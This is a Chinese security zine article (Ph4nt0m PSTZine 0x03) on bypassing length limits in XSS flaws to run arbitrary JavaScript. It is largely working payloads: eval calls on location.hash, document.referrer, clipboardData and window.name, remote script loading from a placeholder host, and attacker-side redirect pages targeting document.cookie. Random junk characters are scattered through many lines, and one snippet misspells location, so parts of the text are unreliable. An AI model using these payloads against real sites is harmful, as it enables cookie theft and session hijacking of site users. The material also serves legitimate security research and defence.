[PSTZine 0x03][0x04][突破XSS字符数量限制执行任意JS代码]

admin

                           ==Ph4nt0m Security Team==
# R/ \+ m' m3 ]5 a# B
                       Issue 0x03, Phile #0x04 of 0x07


4 E" O- T* n: r|=---------------------------------------------------------------------------=|
+ ]/ Z$ n  v1 E2 c|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
|=---------------------------------------------------------------------------=|
8 s7 @3 E: s( F  Y# E" d1 ]& B9 ]& P|=---------------------------------------------------------------------------=|
|=------------------------=[      By luoluo     ]=---------------------------=|
, G4 s5 E/ q# D' q% V; A0 U4 O|=----------------------=[   <luoluo#ph4nt0m.org>  ]=------------------------=|
|=----------------------=[    <luoluo#80sec.com>   ]=------------------------=|
|=---------------------------------------------------------------------------=|
( e  q8 z7 X% n6 M' a
0 F4 D3 ?+ A/ L+ b
7 i5 i* q4 v7 y( C5 ~[目录]
  q  m4 Y4 f! q, }5 d
9 }0 [9 M7 d) z) r* U; k1. 综述
& b* M7 j; F" `) Q# g2. 突破方法
  2.1 利用HTML上下文中其他可以控制的数据
  2.2 利用URL中的数据
9 D! i3 k3 j3 f  2.3 JS上下文的利用
( A: J4 [0 w+ u0 z  2.4 利用浏览器特性在跨域的页面之间传递数据
& o# e" Q  Y( d( F" L    2.4.1 document.referrer
1 t0 p. V& f! X6 y" o/ b% ]    2.4.2 剪切板clipboardData
    2.4.3 窗口名window.name
  2.5 以上的方式结合使用
3. 后记
; O$ J) ^" }8 ?  y4 ]4. 参考
; a2 b' a* Z7 G/ u3 k- A& w) j

9 F' g& W7 ?: s: X( c一、综述

    有些XSS漏洞由于字符数量有限制而没法有效的利用，只能弹出一个对话框来YY，本文主
4 U4 ]9 K) f) y' v6 o要讨论如何突破字符数量的限制进行有效的利用，这里对有效利用的定义是可以不受限制执
行任意JS。对于跨站师们来说，研究极端情况下XSS利用的可能性是一种乐趣；对于产品安全
人员来说，不受限制的利用的可能是提供给开发人员最有力的证据，要求他们重视并修补这些
极端情况下的XSS漏洞。

2 j# j. o% W4 d$ o6 Z    突破的方法有很多种，但是突破的思想基本都一样，那就是执行可以控制的不受限制的数
; I" Q2 Y1 u9 M( @7 v# I据。

: _- j2 f, S* v  Z/ o: _
二、突破方法
5 Q: \' R8 @, h- r
6 D  Z4 Q* B0 b+ M2.1 利用HTML上下文中其他可以控制的数据

, ]& c( D$ `! e    如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据，那么可以通过JS获得该数
# a8 z/ C% N! a. B  L/ {据通过eval或者document.write/innerHTML等方式执行该数据，从而达到突破XSS字符数量限
# U: }$ N! W+ i! P1 ]! U制的目的，下面例子假设div元素的内部数据可以控制，但是该数据已经被HTML编码过：

# X/ }8 k0 _( t--code-------------------------------------------------------------------------
" m3 @% {5 }: i, ]5 P6 j<div id="x">可控的安全的数据</div>
<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------
! [  r7 k6 l+ Z0 [7 l% _* b- _
    由于XSS点有字符数量限制，所以这里只能弹框，那么我们可以把XSS的Payload通过escape
8 Z, N, G( z; [1 d) y& N2 j编码后作为安全的数据，输出到可控的安全数据位置，然后在XSS点执行可控的安全数据：

--code-------------------------------------------------------------------------
$ D# J) J- ~9 _: p$ F5 C8 K<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
-------------------------------------------------------------------------------
3 k/ o, k% q9 ~9 x0 Z6 Y' w; I
长度：28 + len(id)
& [4 p( s, O6 W3 [8 |" k: f+ {
& {/ `3 P0 r' e& S    由于x内部的数据没有字符数量的限制，那么从而可以达到执行任意JS的目的。
. T5 M: i% L4 S3 G8 S
5 `; w0 H8 a% ~5 [  T1 [" N
2.2 利用URL中的数据

& {5 m! U5 a, e    如果页面里不存在上一节所说的可控HTML上下文数据怎么办？有些数据是我们无条件可
控的，第一个想到的就是URL，通过在URL的尾部参数构造要执行的代码，然后在XSS点通过
document.URL/location.href等方式获得代码数据执行，这里假设代码从第80个字符开始到
最后：

--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
, |4 P% ~3 a1 B% F. h
/ s( i' U% b" p$ z8 R- f. v- Y<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------

长度：30
% ]0 e; h& f* k/ m5 {; ?5 H0 O
0 g; G+ |4 V# x--code-------------------------------------------------------------------------
9 E/ x. ^/ M) x: }- W<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
& u9 t$ M5 z0 O8 M4 A8 V- @
长度：31
3 z3 M) I+ N) g
0 ~" E: p/ \  ~+ {. i    上面两个例子对比，前一个例子更短，那么有没有办法更短呢？通过查阅JavaScript手册
- v1 r, t5 W& b2 V的String的方法可以发现，切割字符串有一个更短的函数slice，5个字符比substr还要短一个
字符：

; i6 h$ [7 q5 t0 _--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------

* t9 K: g: P9 w+ X) ^2 F长度：29
* E$ P$ H  }/ S
--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
% ~5 J% S& H) W! {1 b8 J-------------------------------------------------------------------------------
& L2 [- X1 j: S# f; H. r- M: W% w/ a
长度：30
' y* D3 h- y. p- e* t. q
, o3 n& r( R0 m    那么还有没有办法更短呢？答案是YES，查阅一下MSND里的location对象的参考你会发现
有个hash成员，获取#之后的数据，那么我们可以把要执行的代码放在#后面，然后通过hash获
得代码执行，由于获得的数据是#开头的，所以只需要slice一个字符就可以拿到代码：
- q$ J( L. F0 l0 \, b
0 z* T/ s) }1 m6 q& Y0 V  N--code-------------------------------------------------------------------------
- S$ y8 m9 M5 `  V4 {http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
2 A& Q5 ?0 r* _# {
5 g9 x1 o1 \; q' [<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------
* c( a5 O9 }* a/ w- r' ^
) }' Q, e, A- E% A长度：29
( u. ?& E/ |) H4 O) \) ?
    这样比上面的例子又少了一个字符。那么还可以更短么？
3 U/ B$ V8 \8 K6 O$ H" B! F

2.3 JS上下文的利用

8 S. t! I& o" H/ W5 @    为什么我如此痛苦？那是因为JS和DHTML的方法名和属性名太长！瞧瞧这些“糟糕”的名字：
* C/ ?( E0 o0 u: j' G" l9 f
% F) S8 t, V" ?, P7 tString.fromCharCode
getElementById
3 v9 H4 y+ Z, V. [- }getElementsByTagName
) s1 }4 f5 T6 p$ _; rdocument.write
/ {; E; W+ B4 j/ O% e! s! H5 ?8 ^XMLHTTPRequest
; F' K# T. s9 u2 w...
6 {5 N2 N! a2 a: h  |
    就连开发人员也不愿意多写一次，于是很多站点的前端开发工程师们封装了各式各样的
) t) {- C& g: b6 f简化函数，最经典的例子就是：
5 ^+ K. A$ U) |
9 j! ~4 F9 z$ e$ ^4 g--code-------------------------------------------------------------------------
8 g, Z: @. O; r6 C7 n& hfunction $(id) {
& O0 s. j0 J6 `$ Y& ~! L! y" k1 X        return document.getElementById(id);
}
-------------------------------------------------------------------------------

    这些函数同样可以为我们所用，用来缩短我们的Payload的长度。不过上面这个例子不是
  D* q4 ^: Y; P2 ~最短的，IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码：
5 L& A2 m. Y7 D) t' y
  H3 e) C6 R3 J% Y4 }* N--code-------------------------------------------------------------------------
function loads(url) {
        ...
4 d5 j+ M5 A& L! R2 N8 h7 S        document.body.appendChild(script);
}

) I/ [: T. K9 E. a' o0 L$ x/ f<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
-------------------------------------------------------------------------------

7 [  J8 n. G: g! U长度：len(函数名) + len(url) + 5
; }3 ]0 \5 H7 A+ V8 a4 Q
+ l3 o% Q; _, ]( U* n3 L; ]    当然你的url则是越短越好哦！有些函数则会帮我们去作HTTP请求：
; |) @4 T+ ^* \
5 Q" S6 x5 l- I7 W/ d9 E--code-------------------------------------------------------------------------
% C+ Y" W! T/ v0 J8 Nfunction get(url) {
3 `' @5 x9 B5 w) f% U        ...
        return x.responseText;
2 R$ s+ `, Q' g}
4 B8 e* s& \7 f" I5 L+ }
<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
-------------------------------------------------------------------------------
6 i9 P) W) ]1 |3 M( k# U- X0 Y
# O$ B/ C- r" D( b1 ~; R- d( N$ f长度：len(函数名) + len(url) + 11
9 p3 U7 j. A8 e: |$ u
    道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用，比如：

JQuery
" E5 _( D2 A9 |4 c& o3 |' J/ mYUI
...
- x5 `+ p, i& T( H+ Y3 F
( h7 `. w) M( b! d$ I6 t    综上所述，我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我
# A7 W0 G5 `, z们的代码，进而突破长度限制执行任意代码。

7 k4 G$ u- I7 ^  z/ n
% u! c0 K0 B4 |2.4 利用浏览器特性在跨域的页面之间传递数据
& C# y5 G# S7 m( X& `3 Y9 m4 Q: Y, J
    虽然有同源策略的限制，浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的
方法，我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。

  K( K+ d5 L8 d1 E4 e2.4.1 document.referrer
. Z& h& K0 Q  j" U: ~
    攻击者可以在自己的域上构造页面跳转到被XSS页面，在自己域上的页面的url里带了
3 E6 p# ]* ]1 U# b, a$ ZPayload，被XSS的页面通过referrer获取相关代码执行。
2 X6 D8 z) ]% o
攻击者构造的的页面：

--code-------------------------------------------------------------------------
& ]6 J# p0 z# U5 F7 shttp://www.a.com/attack.html?...&alert(document.cookie)

<a href="http://www.xssedsite.com/xssed.php">go</a>
-------------------------------------------------------------------------------
$ C8 y' s, s* d& ]! ^; e4 c* n
被XSS的页面：

--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
) A7 A6 S$ q! I3 r0 K. m-------------------------------------------------------------------------------
) h$ w# @7 R' }. r+ M9 |$ |# |
/ O1 _0 P3 b! w  G  l1 ]0 }长度：34
& _* _# \. ?. s* k0 z
    这种方式利用上还有一些问题，如果使用location.href或者<meta http-equiv=refresh>
实现的自动跳转，在IE里被攻击页面拿不到referrer，而FF则可以。QZ建议用表单提交的方式
比较好，我测试了下，果然通用，FF/IE都可以成功获取referrer：
2 o. Q+ Q" [1 w5 X
--code-------------------------------------------------------------------------
4 n2 ^6 z) ?) ]1 p<script type="text/javascript">
<!--
window.onload = function(){
# r' b$ I) n  d$ ^        var f = document.createElement("form");
        f.setAttribute("method", "get");
* h9 K  r# a2 W0 Q        f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
        document.body.appendChild(f);
        f.submit();
};
//-->
8 h( e% G! M6 G) M; Q</script>
7 n- w' [, e( [-------------------------------------------------------------------------------

2 k: w& `, D  X, x
2.4.2 剪切板clipboardData

    攻击者在自己域的页面上通过clipboardData把Payload写入剪切板，然后在被XSS页面获
+ W1 m9 v) |; }- Q" X取并执行该数据。

- I' `3 W+ j1 P) x; L9 v: K攻击者构造的页面：
) K3 a: ?. O; v4 ~
* H$ r$ U6 m1 G* v4 t& n--code-------------------------------------------------------------------------
3 d$ B! V& {! a, o<script>
1 p4 Q& \$ I( C3 p1 k% sclipboardData.setData("text", "alert(document.cookie)");
6 ^" _8 b+ K/ @: ^( l6 |3 B</script>
+ p& F: Y$ I$ N5 ]" s: ?0 u' a1 }-------------------------------------------------------------------------------

被XSS的页面：
: ^7 A- Z$ s. i
--code-------------------------------------------------------------------------
9 b3 o' D8 |# z5 D5 z8 t# h" J<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------
- b/ x0 B+ T) a% ^: `  Z# ^" h
长度：36

    这种方式只适用于IE系列，并且在IE 7及以上版本的浏览器会有安全提示。

8 ^  I6 ~+ l2 z, X0 ]# T) \0 n
6 j  M5 K4 [" g! y+ b$ v3 R2 J4 o& i& G2.4.3 窗口名window.name

    这是一个很少被用到的特性，在研究同源策略时就注意过这个属性，它是可以跨域传递数
! F% ~1 ]$ d: E0 `3 V' S$ G据的，但是这个特性本身并不是漏洞。

    如果仔细研究过window.open这个方法，会发现一个不常用的第二个参数，这个则是设置
0 W4 ^" h; s, Y3 h窗口名，用于指定target窗口，如果不存在的话则创建新的子窗口，并设置子窗口的name。当
" M" H% ?" Y5 N  B2 ?; X/ u我想打搜window.open时一阵狂喜，喜的是window.name这个属性是window对象的成员，那么只
9 A/ x1 E  _8 W需要name就可以引用该属性，但是测试时却发现window.open方法对于第二个参数进行了严格
的检查，只允许数字字母以及下划线的组合，禁止特殊字符进入，那么这种方式就没法写入JS
% k/ g8 n+ a% A7 W9 T" f5 i' i& D8 y+ h或者VBS。
, c& K% [3 |- W2 o+ s$ e( t! m' a! o
3 j9 b- i8 W: ?* F! M' A    但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符
3 d2 N, W1 Z9 O; K. K9 G9 q) X% A; C! B限制，然后直接跳转到被XSS的页面，通过name属性传递Payload过去执行：

攻击者构造的页面：
9 F" b  g  R( z1 M* {+ w: n
--code-------------------------------------------------------------------------
<script>
window.name = "alert(document.cookie)";
* \9 b; m! |, O0 U+ \locaton.href = "http://www.xssedsite.com/xssed.php";
</script>
" p' a9 ^, O% O' V8 P+ R( Q-------------------------------------------------------------------------------
# d! s9 K/ m1 G2 o
被XSS的页面：
# f. V  T3 s+ P6 h; E  `
--code-------------------------------------------------------------------------
<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------
+ b3 w2 P0 `5 C) r
长度：11

    这个长度可以说是短到极致了，并且这个方法IE/FF都可以很好的支持，是个非常有意思
- R2 _0 g6 K/ M  }' E1 J的技巧，这个技巧的发现也是促成本文的直接原因。

  E4 Y  U% O+ |' f8 ^3 m5 Y    window.name的特性还有其他一些有趣的应用方式，这个方面的话题以后可以专门写篇文
' X/ Z& m  B- _% J* ?* I7 s' A章来探讨。

3 }2 \& i' C9 ^; F' C2 P
8 m" \' j! ~" x4 g/ r6 b" `! M& ^2.5 以上的方式结合使用
' O) b! a1 Q" w* j
" p4 Q. d/ E2 N    以上的方式结合使用，一般情况下会使得长度更长，但是也不排除在某些变态的过滤情况
0 v- u! ?9 J1 T4 s中，灵活的组合上面的方法可能会起到奇效。


三、后记

    JS非常灵活，所以方法肯定不限于这些，在具体的问题的分析和研究中，可以获得很多的
2 v; z# k- B+ u* M乐趣，并且对JS以及浏览器本身有了更深的认识，如果您有巧妙的技巧或者新奇的构思，欢迎
和我交流！
/ v1 }- q2 K/ q' L2 c" R6 S
    感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见！

    本文是纯粹的技术探讨，请勿用于非法用途！


四、参考
6 v# `  N- J6 e, b$ B0 Q7 y
http://msdn.microsoft.com/en-us/library/aa155073.aspx

-EOF-